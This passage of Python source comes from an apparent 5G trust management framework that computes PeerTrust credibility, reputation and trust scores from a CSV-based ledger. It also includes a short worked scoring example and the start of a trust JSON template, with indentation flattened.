last_total_iteraction_number = int(item["currentInteractionNumber"])
elif item["trusteeDID"] == trusteeDID and int(item["totalInteractionNumber"]) > last_total_iteraction_number:
last_total_iteraction_number = int(item["totalInteractionNumber"])
return last_total_iteraction_number
def getCurrentInteractionNumber(self, trustorDID):
""" This method returns the next interaction number for a trustor """
current_iteraction_number = 0
with open(self.dlt_file_name) as f:
reader = csv.DictReader(f)
for item in reader:
if item["trustorDID"] == trustorDID and int(item["currentInteractionNumber"]) > current_iteraction_number:
current_iteraction_number = int(item["currentInteractionNumber"])
elif item["trusteeDID"] == trustorDID and int(item["totalInteractionNumber"]) > current_iteraction_number:
current_iteraction_number = int(item["totalInteractionNumber"])
return current_iteraction_number+1
def getInteractionNumber(self, trustorDID, trusteeDID):
""" This method retrieves the number of interactions between two entities and adds one more interaction """
iteraction_number = 0
list_interactions = self.find_by_column(self.dlt_file_name, 'trustorDID', trustorDID)
for interaction in list_interactions:
if interaction["trusteeDID"] == trusteeDID and int(interaction["interactionNumber"]) > iteraction_number:
iteraction_number = int(interaction["interactionNumber"])
return iteraction_number+1
def getRecommenderDLT(self, trustorDID, trusteeDID):
""" This method recovers a recommender, who is reliable for us, that has recently interacted with a trustee.
Return the last interaction in order to request the last trust value. In this case, reliable means
other trustees with whom we have previously interacted with """
last_interaction = {}
last_registered_interaction = True
with open(self.dlt_file_name) as f:
reader = csv.DictReader(f)
""" Materialise the rows once: the csv reader is a one-shot iterator and cannot be re-read inside the inner loop """
rows = list(reader)
""" Starting from the end to identify the last recommender"""
for interaction in reversed(rows):
""" Check that the last recommender is not ourselves"""
if interaction['trustorDID'] != trustorDID and interaction['trusteeDID'] == trusteeDID:
""" Store the most recent interaction with the Trustee to return it in the case of no trustworthy
recommenders can be found"""
if last_registered_interaction:
last_interaction = interaction
last_registered_interaction = False
"""Check if the Trustor is reliable for us"""
for trustworthy_candidate in reversed(rows):
if trustworthy_candidate['trustorDID'] == trustorDID and trustworthy_candidate['trusteeDID'] == interaction['trustorDID']:
return dict(interaction)
return dict(last_interaction)
def getRecommenderOfferDLT(self, trustorDID, trusteeDID, offerDID):
""" This method recovers an offer associated with a recommender, who is reliable for us, that has recently
interacted with a trustee. Return the last interaction in order to request the last trust value.
In this case, reliable means other trustees with whom we have previously interacted with"""
last_interaction = {}
last_registered_interaction = True
with open(self.dlt_file_name) as f:
reader = csv.DictReader(f)
""" Materialise the rows once: the csv reader is a one-shot iterator and cannot be re-read inside the inner loop """
rows = list(reader)
""" Starting from the end to identify the last recommender"""
for interaction in reversed(rows):
""" Check that the last recommender is not ourselves"""
if interaction['trustorDID'] != trustorDID and interaction['trusteeDID'] == trusteeDID and interaction['offerDID'] == offerDID:
""" Store the most recent interaction with the Trustee """
if last_registered_interaction:
last_interaction = interaction
last_registered_interaction = False
""" Check if the Trustor is reliable for us """
for trustworthy_candidate in reversed(rows):
if trustworthy_candidate['trustorDID'] == trustorDID and trustworthy_candidate['trusteeDID'] == interaction['trustorDID'] and trustworthy_candidate['offerDID'] == offerDID:
return dict(interaction)
return dict(last_interaction)
def getLastRecommendationValue(self, last_interaction):
""" This methods goes to a recommender kafka channel to request a trust score """
global consumer
last_truste_value = 0.0
trustor = last_interaction['trustorDID']
trustee = last_interaction['trusteeDID']
trust_information = self.consumer.readLastTrustValue(self.historical, trustor, trustee)
last_truste_value = trust_information["trust_value"]
return last_truste_value
def getLastOfferRecommendationValue(self, last_interaction):
""" This methods goes to an offer recommender kafka channel to request a trust score """
global consumer
last_truste_value = 0.0
trustor = last_interaction['trustorDID']
trustee = last_interaction['trusteeDID']
offer = last_interaction['offerDID']
trust_information = self.consumer.readLastTrustValueOffer(self.historical, trustor, trustee, offer)
last_truste_value = trust_information["trust_value"]
return last_truste_value
def getTrusteeSatisfactionDLT(self, trusteeDID):
""" This method collects the userSatisfaction from the DLT when a trustor contemplates a feedback. However,
this information should be deleted from the DLT and requested directly to other 5G-TRMFs """
counter = 0
general_satisfaction = 0.0
last_interaction = self.find_by_column(self.dlt_file_name, 'trustorDID', trusteeDID)
for interaction in last_interaction:
general_satisfaction = general_satisfaction + float(interaction['userSatisfaction'])
counter = counter + 1
return round(general_satisfaction/counter, 3)
def generateHistoryTrustInformation(self, producer, consumer_instance, trustorDID, trusteeDID, offerDID, previous_interaction_number):
""" This method generates trust information that will be sent to trustor Kafka Topic. In particular,
it is adding _n_ previous interactions (history) to be contemplated in future assessments"""
list_interactions = []
global consumer
self.consumer = consumer_instance
if previous_interaction_number != 0:
trustInformationTemplate = TrustInformationTemplate()
information = trustInformationTemplate.trustTemplate()
""" Adding information related to the specific request """
information["trustee"]["trusteeDID"] = trusteeDID
information["trustee"]["offerDID"] = offerDID
information["trustee"]["trusteeSatisfaction"] = round(random.uniform(0.8, 0.95), 3)
information["trustor"]["trustorDID"] = trustorDID
information["trustor"]["trusteeDID"] = trusteeDID
information["trustor"]["offerDID"] = offerDID
information["trustor"]["credibility"] = 0.913
information["trustor"]["transactionFactor"] = 0.856
information["trustor"]["communityFactor"] = 0.865
information["trustor"]["direct_parameters"]["userSatisfaction"] = round(random.uniform(0.8, 0.95),3)
direct_weighting = round(random.uniform(0.6, 0.7),2)
information["trustor"]["direct_parameters"]["direct_weighting"] = direct_weighting
information["trustor"]["indirect_parameters"]["recommendation_weighting"] = 1-direct_weighting
information["trustor"]["direct_parameters"]["interactionNumber"] = self.getInteractionNumber(trustorDID, trusteeDID)
information["trustor"]["direct_parameters"]["totalInteractionNumber"] = self.getLastTotalInteractionNumber(trusteeDID)
information["trust_value"] = round(information["trustor"]["direct_parameters"]["direct_weighting"]*(information["trustee"]["trusteeSatisfaction"]*information["trustor"]["credibility"]*information["trustor"]["transactionFactor"])+information["trustor"]["indirect_parameters"]["recommendation_weighting"]*information["trustor"]["communityFactor"],3)
information["currentInteractionNumber"] = self.getCurrentInteractionNumber(trustorDID)
information["initEvaluationPeriod"] = datetime.timestamp(datetime.now())-1000
information["endEvaluationPeriod"] = datetime.timestamp(datetime.now())
if information not in self.historical:
self.historical.append(information)
data = {"trustorDID": trustorDID, "trusteeDID": trusteeDID, "offerDID": offerDID,
"userSatisfaction": information["trustor"]["direct_parameters"]["userSatisfaction"],
"interactionNumber": information["trustor"]["direct_parameters"]["interactionNumber"],
"totalInteractionNumber": information["trustor"]["direct_parameters"]["totalInteractionNumber"],
"currentInteractionNumber": information["currentInteractionNumber"]}
with open(self.dlt_file_name, 'a', encoding='UTF8', newline='') as dlt_data:
writer = csv.DictWriter(dlt_data, fieldnames=self.dlt_headers)
writer.writerow(data)
for i in range(previous_interaction_number-1):
interaction_number = self.getInteractionNumber(trustorDID, trusteeDID)
trust_data = self.consumer.readLastTrustInterationValues(self.historical, trustorDID, trusteeDID, offerDID, interaction_number)
information["trustee"]["trusteeDID"] = trusteeDID
information["trustee"]["offerDID"] = offerDID
information["trustee"]["trusteeSatisfaction"] = round((round(random.uniform(0.8, 0.9),3) + trust_data["trusteeSatisfaction"])/2, 3)
#information["trustee"]["trusteeSatisfaction"] = round(random.uniform(0.8, 0.9), 3)
information["trustor"]["trustorDID"] = trustorDID
information["trustor"]["trusteeDID"] = trusteeDID
information["trustor"]["offerDID"] = offerDID
information["trustor"]["credibility"] = round((round(random.uniform(0.8, 0.9),3) + trust_data["credibility"])/2, 3)
information["trustor"]["transactionFactor"] = round((round(random.uniform(0.75, 0.95), 3) + trust_data["transactionFactor"])/2, 3)
information["trustor"]["communityFactor"] = round((round(random.uniform(0.75, 0.9), 3) + trust_data["communityFactor"])/2, 3)
information["trustor"]["direct_parameters"]["userSatisfaction"] = round(random.uniform(0.8, 0.9),3)
direct_weighting = round(random.uniform(0.6, 0.7),2)
information["trustor"]["direct_parameters"]["direct_weighting"] = direct_weighting
information["trustor"]["indirect_parameters"]["recommendation_weighting"] = 1-direct_weighting
information["trustor"]["direct_parameters"]["interactionNumber"] = interaction_number
information["trustor"]["direct_parameters"]["totalInteractionNumber"] = self.getLastTotalInteractionNumber(trusteeDID)
information["trust_value"] = round(information["trustor"]["direct_parameters"]["direct_weighting"]*(information["trustee"]["trusteeSatisfaction"]*information["trustor"]["credibility"]*information["trustor"]["transactionFactor"])+information["trustor"]["indirect_parameters"]["recommendation_weighting"]*information["trustor"]["communityFactor"],3)
information["currentInteractionNumber"] = self.getCurrentInteractionNumber(trustorDID)
information["initEvaluationPeriod"] = datetime.timestamp(datetime.now())-1000
information["endEvaluationPeriod"] = datetime.timestamp(datetime.now())
if information not in self.historical:
self.historical.append(information)
data = {"trustorDID": trustorDID, "trusteeDID": trusteeDID, "offerDID": offerDID,
"userSatisfaction": information["trustor"]["direct_parameters"]["userSatisfaction"],
"interactionNumber": information["trustor"]["direct_parameters"]["interactionNumber"],
"totalInteractionNumber": information["trustor"]["direct_parameters"]["totalInteractionNumber"],
"currentInteractionNumber": information["currentInteractionNumber"]}
with open(self.dlt_file_name, 'a', encoding='UTF8', newline='') as dlt_data:
writer = csv.DictWriter(dlt_data, fieldnames=self.dlt_headers)
writer.writerow(data)
return None
def generateTrusteeInformation(self, producer, consumer, trustorDID, availableAssets, totalAssets, availableAssetLocation, totalAssetLocation, managedViolations, predictedViolations, executedViolations, nonPredictedViolations, consideredOffers, totalOffers, consideredOfferLocation, totalOfferLocation, managedOfferViolations, predictedOfferViolations, executedOfferViolations, nonPredictedOfferViolations):
""" This method introduces Trustee information based on peerTrust equations and using the minimum
values previously established """
self.consumer = consumer
trustee_selection = random.randint(0,3)
offer_selection = random.randint(0,1)
if not self.list_additional_did_providers:
"Adding the previous DID providers autogenerated to avoid the cold start"
self.list_additional_did_offers = [[] for _ in range(self.max_previous_providers_DLT)]  # independent inner lists, not N aliases of the same list
with open(self.dlt_file_name) as f:
reader = csv.DictReader(f)
pointer = 0
for item in reader:
if item["trustorDID"] not in self.list_additional_did_providers and pointer < self.max_previous_interactions_DLT:
self.list_additional_did_providers.append(item["trustorDID"])
pointer+=1
"Adding the previous DID offers autogenerated to avoid the cold start"
with open(self.dlt_file_name) as f:
reader = csv.DictReader(f)
for item in reader:
if item["trusteeDID"] in self.list_additional_did_providers and item["offerDID"] not in self.list_additional_did_offers:
self.list_additional_did_offers[self.list_additional_did_providers.index(item["trusteeDID"])].append(item["offerDID"])
trusteeDID = self.list_additional_did_providers[trustee_selection]
offerDID = self.list_additional_did_offers[trustee_selection][offer_selection]
information = self.minimumTrustTemplate(trustorDID, trusteeDID, offerDID)
print("\t* Provider ---> "+trusteeDID+" -- Product offer ---> "+offerDID)
information["trustor"]["credibility"] = self.credibility(trustorDID, trusteeDID)
information["trustor"]["transactionFactor"] = self.transactionContextFactor(trustorDID, trusteeDID, offerDID)
information["trustor"]["communityFactor"] = self.communityContextFactor(trustorDID, trusteeDID)
direct_weighting = round(random.uniform(0.6, 0.7),2)
information["trustor"]["direct_parameters"]["direct_weighting"] = direct_weighting
provider_reputation = self.providerReputation(availableAssets, totalAssets, availableAssetLocation, totalAssetLocation, managedViolations, predictedViolations, executedViolations, nonPredictedViolations)
provider_satisfaction = self.providerSatisfaction(trustorDID, trusteeDID, provider_reputation)
offer_reputation = self.offerReputation(consideredOffers, totalOffers, consideredOfferLocation, totalOfferLocation, managedOfferViolations, predictedOfferViolations, executedOfferViolations, nonPredictedOfferViolations)
offer_satisfaction = self.offerSatisfaction(trustorDID, trusteeDID, offerDID, offer_reputation)
information["trustor"]["direct_parameters"]["providerSatisfaction"] = provider_satisfaction
ps_weighting = round(random.uniform(0.4, 0.6),2)
information["trustor"]["direct_parameters"]["PSWeighting"] = ps_weighting
information["trustor"]["direct_parameters"]["offerSatisfaction"] = offer_satisfaction
os_weighting = 1-ps_weighting
information["trustor"]["direct_parameters"]["OSWeighting"] = os_weighting
information["trustor"]["direct_parameters"]["providerReputation"] = provider_reputation
information["trustor"]["direct_parameters"]["offerReputation"] = offer_reputation
information["trustor"]["direct_parameters"]["availableAssets"] = availableAssets
information["trustor"]["direct_parameters"]["totalAssets"] = totalAssets
information["trustor"]["direct_parameters"]["availableAssetLocation"] = availableAssetLocation
information["trustor"]["direct_parameters"]["totalAssetLocation"] = totalAssetLocation
information["trustor"]["direct_parameters"]["managedViolations"] = managedViolations
information["trustor"]["direct_parameters"]["predictedViolations"] = predictedViolations
information["trustor"]["direct_parameters"]["executedViolations"] = executedViolations
information["trustor"]["direct_parameters"]["nonPredictedOfferViolations"] = nonPredictedViolations
information["trustor"]["direct_parameters"]["consideredOffers"] = consideredOffers
information["trustor"]["direct_parameters"]["totalOffers"] = totalOffers
information["trustor"]["direct_parameters"]["consideredOfferLocation"] = consideredOfferLocation
information["trustor"]["direct_parameters"]["totalOfferLocation"] = totalOfferLocation
information["trustor"]["direct_parameters"]["managedOfferViolations"] = managedOfferViolations
information["trustor"]["direct_parameters"]["predictedOfferViolations"] = predictedOfferViolations
information["trustor"]["direct_parameters"]["executedOfferViolations"] = executedOfferViolations
information["trustor"]["direct_parameters"]["nonPredictedOfferViolations"] = nonPredictedOfferViolations
#information["trustor"]["direct_parameters"]["feedbackNumber"] = nonPredictedViolations
#information["trustor"]["direct_parameters"]["feedbackOfferNumber"] = nonPredictedViolations
#information["trustor"]["direct_parameters"]["location"] = nonPredictedViolations
#information["trustor"]["direct_parameters"]["validFor"] = nonPredictedViolations
information["trustor"]["indirect_parameters"]["recommendation_weighting"] = 1-direct_weighting
information["trustee"]["trusteeDID"] = trusteeDID
information["trustee"]["offerDID"] = offerDID
information["trustee"]["trusteeSatisfaction"] = self.getTrusteeSatisfactionDLT(trusteeDID)
information["trustor"]["direct_parameters"]["userSatisfaction"] = self.satisfaction(ps_weighting, os_weighting, provider_satisfaction, offer_satisfaction)
information["trust_value"] = round(information["trustor"]["direct_parameters"]["direct_weighting"]*(information["trustee"]["trusteeSatisfaction"]*information["trustor"]["credibility"]*information["trustor"]["transactionFactor"])+information["trustor"]["indirect_parameters"]["recommendation_weighting"]*information["trustor"]["communityFactor"],3)
if information not in self.historical:
self.historical.append(information)
data = {"trustorDID": trustorDID, "trusteeDID": trusteeDID, "offerDID": offerDID,
"userSatisfaction": information["trustor"]["direct_parameters"]["userSatisfaction"],
"interactionNumber": information["trustor"]["direct_parameters"]["interactionNumber"],
"totalInteractionNumber": information["trustor"]["direct_parameters"]["totalInteractionNumber"],
"currentInteractionNumber": information["currentInteractionNumber"]}
with open(self.dlt_file_name, 'a', encoding='UTF8', newline='') as dlt_data:
writer = csv.DictWriter(dlt_data, fieldnames=self.dlt_headers)
writer.writerow(data)
return data
def setTrusteeInteractions(self, producer, consumer, trusteeDID, interactions):
""" This method introduces interactions to the DLT in order to avoid a cold start of all system """
for i in range(interactions):
availableAssets = randint(2,10)
totalAssets = availableAssets + randint(0,2)
availableAssetLocation = randint(1,6)
totalAssetLocation = availableAssetLocation + randint(0,2)
managedViolations = randint(10,25)
predictedViolations = managedViolations + randint(0,3)
executedViolations = randint(0,3)
nonPredictedViolations = randint(0,4)
consideredOffers = randint(2,10)
totalOffers = consideredOffers + randint(0,2)
consideredOfferLocation = randint(1,6)
totalOfferLocation = consideredOfferLocation + randint(0,2)
managedOfferViolations = randint(10,25)
predictedOfferViolations = managedOfferViolations + randint(0,3)
executedOfferViolations = randint(0,3)
nonPredictedOfferViolations = randint(0,4)
self.generateTrusteeInformation(producer, consumer, trusteeDID, availableAssets, totalAssets, availableAssetLocation, totalAssetLocation, managedViolations, predictedViolations, executedViolations, nonPredictedViolations, consideredOffers, totalOffers, consideredOfferLocation, totalOfferLocation, managedOfferViolations, predictedOfferViolations, executedOfferViolations, nonPredictedOfferViolations)
def getLastHistoryTrustValue(self, trustorDID, trusteeDID):
""" This method retrieves the last trust score that a trustor has stored about a trustee in its historical"""
global consumer
trust_information = self.consumer.readLastTrustValue(self.historical, trustorDID, trusteeDID)
if bool(trust_information):
            last_trust_value = trust_information["trust_value"]
            return last_trust_value
else:
"""In this case, Trustor didn't have an interaction with Trustee and
the provider recommendation is based on the last interaction registered in the DLT"""
return 1
def getLastOfferHistoryTrustValue(self, trustorDID, trusteeDID, offerDID):
""" This method retrieves the last trust score that a trustor has stored about an offer trustee
in its historical"""
global consumer
trust_information = self.consumer.readLastTrustValueOffer(self.historical, trustorDID, trusteeDID, offerDID)
if bool(trust_information):
            last_trust_value = trust_information["trust_value"]
            return last_trust_value
else:
"""In this case, Trustor didn't have an interaction with Trustee and
the provider recommendation is based on the last interaction registered in the DLT"""
return 1
def getOfferFeedbackNumberDLT(self, trusteeDID, offerDID):
""" This method counts the number of feedbacks registered in the DLT for a particular offer """
counter = 0
""" Check that the last recommender is not ourselves"""
list_interactions = self.find_by_column(self.dlt_file_name, 'trusteeDID', trusteeDID)
""" Check the number of interactions whose offerID is the same"""
for interaction in list_interactions:
if interaction["offerDID"] == offerDID:
counter+=1
return counter
def getTrusteeFeedbackNumberDLT(self, trusteeDID):
""" This method counts the number of feedbacks registered in the DLT for a particular trustee """
""" Check that the last recommender is not ourselves"""
return len(self.find_by_column(self.dlt_file_name, 'trusteeDID', trusteeDID))
def getTrustworthyRecommendationDLT(self, trustorDID, trusteeDID, trustworthy_recommender_list):
""" This method returns from a trusted list those recommender that have interacted with the trustor """
trustworthy_recommendations = []
list_interactions = self.find_by_column(self.dlt_file_name, 'trusteeDID', trusteeDID)
""" Starting from the end to identify the last recommender"""
for interaction in reversed(list_interactions):
""" We obtain the latest trust value from our reliable recommenders on the trustor giving
the highest weight to the final recommendations."""
if interaction['trustorDID'] != trustorDID and interaction['trustorDID'] in trustworthy_recommender_list:
trustworthy_recommendations.append(interaction['trustorDID'])
trustworthy_recommender_list.remove(interaction['trustorDID'])
return trustworthy_recommendations
def getLastCredibility(self, trustorDID, trusteeDID):
""" This method recovers the last credibility value registered in the DLT for a particular trustee"""
global consumer
trust_information = self.consumer.readLastTrustValue(self.historical, trustorDID, trusteeDID)
if bool(trust_information):
last_credibility = trust_information["credibility"]
return last_credibility
else:
"""In this case, Trustor didn't have an credibility with Trustee and
the provider recommendation is based on the last history value registered in its Kafka topic"""
return 1
def getTrustorInteractions(self, trustorDID):
""" This methods return all trustor's interactions registered in the DLT"""
trustee_interactions = []
list_trustor_interactions = self.find_by_column(self.dlt_file_name, 'trustorDID', trustorDID)
for interaction in list_trustor_interactions:
trustee_interactions.append(interaction["trusteeDID"])
return trustee_interactions
def getTrusteeInteractions(self, trustorDID, trusteeDID):
""" This methods return all entities that have interacted with a trustee and
have published feedbacks in the DLT"""
interactions = []
list_interactions = self.find_by_column(self.dlt_file_name, 'trusteeDID', trusteeDID)
for interaction in list_interactions:
if interaction["trustorDID"] != trustorDID:
interactions.append(interaction["trustorDID"])
return interactions
"""%%%%%%%%%%%%%% PEERTRUST EQUATIONS %%%%%%%%%%%%%%%%%"""
def credibility(self, trustorDID, trusteeDID):
previous_trustor_interactions = self.getTrustorInteractions(trustorDID)
similarity_summation = 0.0
summation_counter = 0
if previous_trustor_interactions:
for previous_interaction in previous_trustor_interactions:
summation_counter = summation_counter + 1
similarity_summation = similarity_summation + self.similarity(previous_interaction)
else:
similarity_summation = 1
summation_counter = 1
trustee_similarity = self.similarity(trusteeDID)
credibility = trustee_similarity/(similarity_summation/summation_counter)
if credibility > 1.0:
credibility = (similarity_summation/summation_counter)/trustee_similarity
return round(credibility, 3)
def similarity(self, trusteeDID):
""" This method identifies stakeholders who have evaluated one or more entities in common with the trustor
(trustee parameter) to compare their satisfaction values and determine how credible the trustor's
(trustee parameter) satisfaction value is """
common_interaction = []
trustor_interaction_list = self.getTrustorInteractions(trusteeDID)
for interaction in trustor_interaction_list:
common_interaction = self.getTrusteeInteractions(trusteeDID, interaction)
if common_interaction:
""" Currently, only one common interaction is contemplated """
break
common_interaction_list = self.getTrustorInteractions(common_interaction[0])
IJS_counter = 0
global_satisfaction_summation = 0.0
for interaction in trustor_interaction_list:
if interaction in common_interaction_list:
trustor_satisfaction_summation = self.consumer.readSatisfactionSummation(self.historical, trusteeDID, interaction)
common_interaction_satisfaction_summation = self.consumer.readSatisfactionSummation(self.historical, common_interaction[0], interaction)
satisfaction_summation = pow((trustor_satisfaction_summation - common_interaction_satisfaction_summation), 2)
global_satisfaction_summation = global_satisfaction_summation + satisfaction_summation
IJS_counter = IJS_counter + 1
final_similarity = 1 - math.sqrt(global_satisfaction_summation/IJS_counter)
return final_similarity
def communityContextFactor(self, trustorDID, trusteeDID):
""" Static list of recommender based on the domains registered in the DLT. TODO dynamic """
global consumer
trustworthy_recommender_list = self.list_additional_did_providers[:]
total_registered_trustee_interaction = self.consumer.readTrusteeInteractions(self.historical, trusteeDID)
number_trustee_feedbacks_DLT = self.getTrusteeFeedbackNumberDLT(trusteeDID)
trustee_interaction_rate = number_trustee_feedbacks_DLT / total_registered_trustee_interaction
if trustorDID in trustworthy_recommender_list:
trustworthy_recommender_list.remove(trustorDID)
trustworthy_recommendations = self.getTrustworthyRecommendationDLT(trustorDID, trusteeDID, trustworthy_recommender_list)
summation_trustworthy_recommendations = 0.0
for recommender in trustworthy_recommendations:
last_value = self.getLastHistoryTrustValue(recommender, trusteeDID)
last_credibility = self.getLastCredibility(trustorDID, recommender)
summation_trustworthy_recommendations = summation_trustworthy_recommendations + (last_credibility*last_value)
return round((trustee_interaction_rate+(summation_trustworthy_recommendations/len(trustworthy_recommendations)))/2,3)
def communityContextFactor2(self, trustorDID, trusteeDID):
""" This method displays the recommender on the screen and we have changed the parameters of the
getLastCredibility, the only difference being """
global consumer
trustworthy_recommender_list = self.list_additional_did_providers[:]
total_registered_trustee_interaction = self.consumer.readTrusteeInteractions(self.historical, trusteeDID)
number_trustee_feedbacks_DLT = self.getTrusteeFeedbackNumberDLT(trusteeDID)
trustee_interaction_rate = number_trustee_feedbacks_DLT / total_registered_trustee_interaction
if trustorDID in trustworthy_recommender_list:
trustworthy_recommender_list.remove(trustorDID)
trustworthy_recommendations = self.getTrustworthyRecommendationDLT(trustorDID, trusteeDID, trustworthy_recommender_list)
summation_trustworthy_recommendations = 0.0
print("\n\tComputing community factor:")
for recommender in trustworthy_recommendations:
print("\n\tRecommendation from ", recommender, " over ", trusteeDID, " to calculate the community factor")
last_value = self.getLastHistoryTrustValue(recommender, trusteeDID)
print("\tLast trust score of ", recommender, " on ", trusteeDID, " was ---> ",last_value)
last_credibility = self.getLastCredibility(trustorDID, recommender)
print("\tCredibility of ",trustorDID," on the recommender (", recommender, ") --->", round(last_credibility, 3), "\n")
summation_trustworthy_recommendations = summation_trustworthy_recommendations + (last_credibility*last_value)
return round((trustee_interaction_rate+(summation_trustworthy_recommendations/len(trustworthy_recommendations)))/2,3)
def transactionContextFactor(self, trustorDID, trusteeDID, offerDID):
global consumer
""" Currently, only one time-window is contemplated """
total_registered_trustee_interaction = self.consumer.readTrusteeInteractions(self.historical, trusteeDID)
total_registered_offer_interactions = self.consumer.readOfferTrusteeInteractions(self.historical, trusteeDID, offerDID)
number_offer_trustee_feedbacks_DLT = self.getOfferFeedbackNumberDLT(trusteeDID, offerDID)
number_trustee_feedbacks_DLT = self.getTrusteeFeedbackNumberDLT(trusteeDID)
transactionFactor = (number_offer_trustee_feedbacks_DLT / total_registered_offer_interactions + number_trustee_feedbacks_DLT / total_registered_trustee_interaction)/2
return round(transactionFactor, 3)
def satisfaction(self, PSWeighting, OSWeighting, providerSatisfaction, offerSatisfaction):
return PSWeighting*providerSatisfaction + OSWeighting*offerSatisfaction
def providerSatisfaction(self, trustorDID, trusteeDID, providerReputation):
""" This method computes the Provider's satisfaction considering its reputation and recommendations"""
""" Only one recommendation is currently contemplated"""
last_interaction = self.getRecommenderDLT(trustorDID, trusteeDID)
provider_recommendation = self.getLastRecommendationValue(last_interaction)
""" We obtain our last trust value on the recommender from our Kafka topic """
last_trust_score_recommender = self.getLastHistoryTrustValue(trustorDID, last_interaction['trustorDID'])
provider_satisfaction = round((providerReputation + provider_recommendation * last_trust_score_recommender)/2, 3)
return provider_satisfaction
def providerReputation(self, availableAssets, totalAssets, availableAssetLocation, totalAssetLocation, managedViolations, predictedViolations, executedViolations, nonPredictedViolations):
""" Currently, only one time-window is contemplated"""
try:
assets_percentage = availableAssets / totalAssets
except ZeroDivisionError:
assets_percentage = 0
try:
assets_location_percentage = availableAssetLocation / totalAssetLocation
except ZeroDivisionError:
assets_location_percentage = 0
try:
managed_violations_percentage = managedViolations / predictedViolations
except ZeroDivisionError:
managed_violations_percentage = 0
try:
violations_percentage = (executedViolations + nonPredictedViolations) / predictedViolations
except ZeroDivisionError:
violations_percentage = 0
reputation = ((assets_percentage + assets_location_percentage + (2 * managed_violations_percentage) - (2 * violations_percentage)) + 2) / 6
return reputation
def offerSatisfaction(self, trustorDID, trusteeDID, offerDID, offerReputation):
""" This method computes the Provider's satisfaction considering its reputation and recommendations"""
""" Only one recommendation is currently contemplated"""
last_interaction = self.getRecommenderOfferDLT(trustorDID, trusteeDID, offerDID)
provider_recommendation = self.getLastOfferRecommendationValue(last_interaction)
""" We obtain our last trust value on the offer from our Kafka topic"""
last_trust_score_recommender = self.getLastOfferHistoryTrustValue(last_interaction['trustorDID'], trusteeDID, offerDID)
provider_satisfaction = round((offerReputation + provider_recommendation * last_trust_score_recommender)/2, 3)
return provider_satisfaction
def offerReputation(self, consideredOffers, totalOffers, consideredOfferLocation, totalOfferLocation, managedOfferViolations, predictedOfferViolations, executedOfferViolations, nonPredictedOfferViolations):
""" Currently, only one time-window is contemplated"""
try:
assets_percentage = consideredOffers / totalOffers
except ZeroDivisionError:
assets_percentage = 0
try:
assets_location_percentage = consideredOfferLocation / totalOfferLocation
except ZeroDivisionError:
assets_location_percentage = 0
try:
managed_violations_percentage = managedOfferViolations / predictedOfferViolations
except ZeroDivisionError:
managed_violations_percentage = 0
try:
violations_percentage = (executedOfferViolations + nonPredictedOfferViolations) / predictedOfferViolations
except ZeroDivisionError:
violations_percentage = 0
reputation = ((assets_percentage + assets_location_percentage + (2 * managed_violations_percentage) - (2 * violations_percentage)) + 2) / 6
return reputation
```
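To make the scoring logic above easier to follow, here is a minimal, self-contained sketch of how the final PeerTrust score is composed from the direct and indirect terms used in `generateTrusteeInformation`; all numeric values are hypothetical and serve only as a worked example.

```python
# Worked example of the trust score composition (hypothetical values only).
direct_weighting = 0.7                      # weight of direct experience
recommendation_weighting = 1 - direct_weighting
trustee_satisfaction = 0.8
credibility = 0.9
transaction_factor = 0.75
community_factor = 0.6

trust_value = round(
    direct_weighting * (trustee_satisfaction * credibility * transaction_factor)
    + recommendation_weighting * community_factor,
    3,
)
print(trust_value)  # 0.7 * 0.54 + 0.3 * 0.6 = 0.558
```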
#### File: Trust-management-framework/peer_Trust_Model/trustInformationTemplate.py
```python
class TrustInformationTemplate():
def trustTemplate(self):
"""This methods introduces the general Trust template that will be used in order to generate a dataset,
and also to compute new trust scores and provide recomendations """
general_JSON = {
"trustor": {
"trustorDID": "string",
"trusteeDID": "string",
"credibility": "Unknown Type: double",
"transactionFactor": "Unknown Type: double",
"communityFactor": "Unknown Type: double",
"trust_propagation": True,
"trust_update": "Unknown",
"trust_evaluation": "PeerTrust",
"direct_parameters": {
"direct_weighting": "Unknown Type: double",
"userSatisfaction": "Unknown Type: double",
"providerSatisfaction": "Unknown Type: double",
"PSWeighting": "Unknown Type: double",
"offerSatisfaction": "Unknown Type: double",
"OSWeighting": "Unknown Type: double",
"providerReputation": "Unknown Type: double",
"offerReputation": "Unknown Type: double",
"availableAssets": "Unknown Type: double",
"totalAssets": "Unknown Type: double",
"availableAssetLocation": "Unknown Type: double",
"totalAssetLocation": "Unknown Type: double",
"managedViolations": "Unknown Type: double",
"predictedViolations": "Unknown Type: double",
"executedViolations": "Unknown Type: double",
"nonPredictedViolations": "Unknown Type: double",
"consideredOffers": "Unknown Type: double",
"totalOffers": "Unknown Type: double",
"consideredOfferLocation": "Unknown Type: double",
"totalOfferLocation": "Unknown Type: double",
"managedOfferViolations": "Unknown Type: double",
"predictedOfferViolations": "Unknown Type: double",
"executedOfferViolations": "Unknown Type: double",
"nonPredictedOfferViolations": "Unknown Type: double",
"interactionNumber": "int",
"totalInteractionNumber": "int",
"feedbackNumber": "int",
"feedbackOfferNumber": "int",
"location": "Unknown Type: geographicalAddress",
"validFor": "Unknown Type: timePeriod"
},
"indirect_parameters": {
"recommendation_weighting": "Unknown Type: double",
"recommendations": "Unknown Type: recommendationlist"
},
"offerDID": {
"type": "string"
}
},
"trustee": {
"trusteeDID": "string",
"recommendation": {
"recommender": "string",
"trust_level": "Unknown Type: double",
"location": "Unknown Type: geographicalAddress"
},
"offerDID": {
"type": "string"
},
"trusteeSatisfaction": "double"
},
"trust_value": "double",
"currentInteractionNumber": "int",
"evaluation_criteria": "Inter-domain",
"initEvaluationPeriod": "Unknown Type: timestamp",
"endEvaluationPeriod": "Unknown Type: timestamp"
}
return general_JSON
def trustTemplate2(self):
"""This methods introduces the general Trust template that will be used in order to generate a dataset,
and also to compute new trust scores and provide recomendations """
general_JSON = {
"trustor": {
"trustorDID": "string",
"trusteeDID": "string",
"credibility": "Unknown Type: double",
"transactionFactor": "Unknown Type: double",
"communityFactor": "Unknown Type: double",
"trust_propagation": True,
"trust_update": "Unknown",
"trust_evaluation": "PeerTrust",
"direct_parameters": {
"direct_weighting": "Unknown Type: double",
"userSatisfaction": "Unknown Type: double",
"providerSatisfaction": "Unknown Type: double",
"PSWeighting": "Unknown Type: double",
"offerSatisfaction": "Unknown Type: double",
"OSWeighting": "Unknown Type: double",
"providerReputation": "Unknown Type: double",
"offerReputation": "Unknown Type: double",
"availableAssets": "Unknown Type: double",
"totalAssets": "Unknown Type: double",
"availableAssetLocation": "Unknown Type: double",
"totalAssetLocation": "Unknown Type: double",
"managedViolations": "Unknown Type: double",
"predictedViolations": "Unknown Type: double",
